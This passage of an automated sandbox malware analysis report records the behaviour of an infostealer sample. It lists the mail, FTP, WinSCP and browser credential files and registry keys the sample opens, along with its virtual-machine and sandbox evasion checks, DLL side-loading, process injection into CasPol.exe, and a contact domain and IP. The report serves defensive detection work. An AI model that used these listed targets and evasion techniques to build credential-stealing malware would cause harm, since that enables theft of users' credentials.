            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.945728921.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.945728921.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.944634357.0000000000848000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.944895221.000000000087C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7576Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\libenchant-2.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\libLerc.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msvcr100.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gspawn-win64-helper.exeJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CDMDataEventHandler.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9440Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D2D0C40 sldt word ptr [eax]4_2_1D2D0C40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeAPI call chain: ExitProcess graph end nodegraph_0-4365
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeAPI call chain: ExitProcess graph end nodegraph_0-4517
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.946012142.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.946012142.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.946012142.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.946012142.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.945728921.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.946012142.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000004.00000002.5704750244.000000000129C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5702999054.000000000122B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.945728921.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.946012142.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.944634357.0000000000848000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.946012142.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.944895221.000000000087C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.946012142.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_71081BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_71081BFF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_203E6250 LdrInitializeThunk,4_2_203E6250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8884, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8884, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8884, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Ingress Tool Transfer
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API
            1
            Windows Service
            1
            Access Token Manipulation
            21
            Obfuscated Files or Information
            1
            Credentials in Registry
            117
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            Exfiltration Over Bluetooth2
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)1
            Windows Service
            1
            Software Packing
            Security Account Manager321
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            Automated Exfiltration2
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)11
            Process Injection
            1
            Timestomp
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            Scheduled Transfer112
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets251
            Virtualization/Sandbox Evasion
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common251
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Access Token Manipulation
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 635390 Sample: SecuriteInfo.com.Gen.Varian... Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 28 donaldtrumpverse.com 2->28 30 solucionest.com.ar 2->30 32 ftp.solucionest.com.ar 2->32 36 Found malware configuration 2->36 38 Antivirus detection for URL or domain 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 4 other signatures 2->42 8 SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe 4 273 2->8         started        signatures3 process4 file5 20 C:\Users\user\AppData\Local\...\System.dll, PE32 8->20 dropped 22 C:\Users\user\AppData\Local\...\msvcr100.dll, PE32 8->22 dropped 24 C:\Users\user\AppData\...\libenchant-2.dll, PE32+ 8->24 dropped 26 3 other files (none is malicious) 8->26 dropped 44 Tries to detect Any.run 8->44 12 CasPol.exe 15 11 8->12         started        16 CasPol.exe 8->16         started        signatures6 process7 dnsIp8 34 donaldtrumpverse.com 103.211.219.10, 49727, 80 PUBLIC-DOMAIN-REGISTRYUS Seychelles 12->34 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->46 48 Tries to steal Mail credentials (via file / registry access) 12->48 50 Tries to harvest and steal ftp login credentials 12->50 56 2 other signatures 12->56 18 conhost.exe 12->18         started        52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->52 54 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->54 signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe43%VirustotalBrowse
